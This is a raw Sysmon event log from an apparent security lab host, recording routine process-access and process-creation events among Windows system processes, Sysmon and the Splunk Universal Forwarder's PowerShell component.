10341000x800000000000000045060Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.812{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-193A-629A-3B07-000000006002}2064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045059Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.812{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045058Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.812{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045057Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.812{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045056Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.812{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045055Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.812{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045054Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.812{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045053Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.812{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045052Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.812{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045051Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.812{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045050Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.812{0A5DF930-E35B-6299-0500-000000006002}4121840C:\Windows\system32\csrss.exe{0A5DF930-193A-629A-3B07-000000006002}2064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045049Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.812{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-193A-629A-3B07-000000006002}2064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045048Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.812{0A5DF930-193A-629A-3B07-000000006002}2064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000045047Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.312{0A5DF930-193A-629A-3A07-000000006002}14844040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045046Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.140{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-193A-629A-3A07-000000006002}1484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045045Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.140{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045044Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.140{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045043Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.140{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045042Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.140{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045041Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.140{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045040Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.140{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045039Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.140{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045038Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.140{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045037Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.140{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045036Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.140{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-193A-629A-3A07-000000006002}1484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045035Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.140{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-193A-629A-3A07-000000006002}1484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045034Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:50.141{0A5DF930-193A-629A-3A07-000000006002}1484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 